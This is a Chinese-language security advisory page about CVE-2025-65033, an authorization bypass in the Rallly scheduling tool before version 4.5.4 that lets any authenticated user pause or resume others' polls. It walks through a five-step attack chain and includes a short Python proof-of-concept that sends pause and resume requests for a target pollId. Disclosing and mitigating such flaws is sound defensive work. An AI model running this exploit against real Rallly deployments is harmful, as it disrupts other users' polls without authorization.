IPBUF安全漏洞报告
English
CVE-2025-65033 CVSS 8.1 高危

CVE-2025-65033 Rallly投票管理授权绕过漏洞

披露日期: 2025-11-19

漏洞信息

漏洞编号
CVE-2025-65033
漏洞类型
授权绕过
CVSS评分
8.1 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Rallly

相关标签

授权绕过Rallly投票管理访问控制高危

漏洞概述

Rallly是一款开源的日程安排和协作工具。在4.5.4版本之前,投票管理功能存在严重的授权缺陷,允许任何已认证用户暂停或恢复任意投票,而无需验证用户是否为投票所有者。系统仅使用公开的pollId来识别投票,缺乏有效的所有权验证机制,导致任何登录用户都可以对他人创建的投票进行操作,造成应用程序的完整性和可用性损失。攻击者可利用此漏洞随意中断他人创建的投票,破坏正常的协作流程。

技术细节

漏洞根源在于Rallly的投票管理API端点仅依赖公开的pollId参数来识别目标投票,而未对该pollId对应的投票进行所有权验证。当用户访问暂停/恢复投票的API时,系统仅检查用户是否已登录(PR:L),而不验证当前用户是否为该投票的创建者。攻击者只需获取任意投票的pollId(通过公开分享链接),即可构造请求对该投票执行暂停或恢复操作。CVSS向量显示攻击复杂度低(AC:L),无需特殊权限即可利用,攻击成功后可影响投票系统的完整性和可用性。

攻击链分析

STEP 1
步骤1
攻击者注册并登录Rallly平台获取有效会话token
STEP 2
步骤2
攻击者获取目标投票的pollId(通过公开分享链接或枚举)
STEP 3
步骤3
攻击者构造POST请求到/api/polls/{pollId}/pause或/api/polls/{pollId}/resume端点
STEP 4
步骤4
服务器仅验证用户已登录,未验证投票所有权,直接执行操作
STEP 5
步骤5
目标投票被恶意暂停或恢复,造成完整性和可用性损失

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # CVE-2025-65033 PoC - Rallly Authorization Bypass # Any authenticated user can pause/resume any poll TARGET_URL = "https://your-rallly-instance.com" POLL_ID = "target-poll-id-here" # Public poll ID from share link SESSION_TOKEN = "your-authenticated-session-token" headers = { "Authorization": f"Bearer {SESSION_TOKEN}", "Content-Type": "application/json" } # Pause any poll (regardless of ownership) pause_url = f"{TARGET_URL}/api/polls/{POLL_ID}/pause" response = requests.post(pause_url, headers=headers) print(f"Pause request status: {response.status_code}") print(f"Response: {response.text}") # Resume any poll (regardless of ownership) resume_url = f"{TARGET_URL}/api/polls/{POLL_ID}/resume" response = requests.post(resume_url, headers=headers) print(f"Resume request status: {response.status_code}") print(f"Response: {response.text}") # Note: No ownership verification is performed on the server side

影响范围

Rallly < 4.5.4

防御指南

临时缓解措施
如果无法立即升级,可通过配置Web应用防火墙(WAF)规则限制投票管理API的访问频率,并对异常操作行为进行监控和告警。同时限制投票分享链接的可见性范围,避免pollId被枚举。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表